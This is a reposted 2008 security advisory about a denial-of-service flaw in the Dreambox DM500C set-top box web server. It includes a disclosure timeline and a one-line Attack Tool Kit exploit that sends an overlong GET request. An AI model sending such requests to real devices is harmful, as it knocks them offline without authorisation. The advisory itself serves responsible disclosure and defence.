[UNIX] Dreambox DM500 Webserver Long URL Request Denial of Service



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Dreambox DM500 Webserver Long URL Request Denial of Service
------------------------------------------------------------------------


SUMMARY

<http://www.dream-multimedia-tv.de/> Dreambox is "a Linux-based DVB
satellite, terrestrial and cable digital television decoder (set-top box),
produced by German multimedia vendor Dream Multimedia". Marc Ruef at scip
AG found an input validation error within the web interface of the model
DM500C. Other models, for example DM500S, might be affected too.

DETAILS

An attacker is able to send a very long http request string (approx. 512
bytes) to the web server which will cause a denial of service. The web
interface and some parts of the operating system might not be responsible
anymore.

Exploit:
It is possible to exploit the vulnerability with a common web browser by
using a long url.

The http web server fingerprinting suite
<http://www.computec.ch/projekte/httprecon/> httprecon is able to
reproduce the problem too. Just use the test plugin get_long (activated by
default).

The Attack Tool Kit ( <http://www.computec.ch/projekte/atk/> ATK) is able
to exploit this vulnerability with the following generic ASL code (expand
the long URL request):
open|send GET http://192.168.0.1/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *

Impact:
Because the attack is possible without further authentication, users with
access possibilities to the web server might affect the behavior of the
device.

The web interface and some parts of the operating system are not
responsible anymore. A restart of the device is required to provide full
functionality again.

Disclosure timeline:
2008/04/28 Identification of the vulnerability by Marc Ruef
2008/04/30 First information to support-at-Dream-Multimedia-Tv.de
2008/04/30 Automated reply by the ticketing system (ticket id
2008043010000466)
2008/04/30 Manual response by Nils Weiberg announcing further
investigation
2008/05/22 Request for current state of investigation
2008/05/22 Another response by Nils Weiberg that the research is ongoing
2008/07/15 Last request for current state of investigation
2008/07/15 Another response by Nils Weiberg without further details
2008/08/29 Public disclosure of the advisory


ADDITIONAL INFORMATION

The information has been provided by <mailto:maru@xxxxxxx> Marc Ruef.
The original article can be found at:
<http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3807>
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3807



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NEWS] Blogger.com HTTP Response Splitting Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HTTP headers response, this causes the portal to become vulnerable to HTTP ... 13/01/2006 - Vendor response and confirmation that bug fixed. ...
    (Securiteam)
  • [NT] DataTrac Activity Console DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... DataTrac is "an application that uses the Winsock component to bind a port ... When connect try to send GET request,the source debug code will show ... The out data-buffer is doesn't have a response to handle from incoming ...
    (Securiteam)
  • [EXPL] MS Internet Explorer DoS (FTP Server Response, MS07-016, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... MS Internet Explorer DoS (FTP Server Response, MS07-016, Exploit) ... A remote code execution vulnerability exists in the way Internet Explorer ...
    (Securiteam)
  • [NT] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability exists in the Novell GroupWise Messenger Client ... The server always response the client's ...
    (Securiteam)
  • [NEWS] D-Link DWL-2100ap Information Disclosure
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... D-Link DWL-2100ap Information Disclosure ... 17/02/2006 - No response. ...
    (Securiteam)